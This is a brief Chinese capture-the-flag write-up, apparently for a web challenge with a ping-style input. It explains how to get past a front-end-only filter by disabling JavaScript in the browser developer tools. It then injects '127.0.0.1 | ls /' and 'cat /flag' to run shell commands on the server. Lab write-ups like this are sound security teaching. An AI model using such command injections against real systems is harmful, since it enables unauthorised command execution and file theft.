主题
查看源代码, 发现前端过滤; command + option + i ;
然后 command + option + p;禁用js
127.0.0.1 | ls /
发现flag;或者直接cat /flag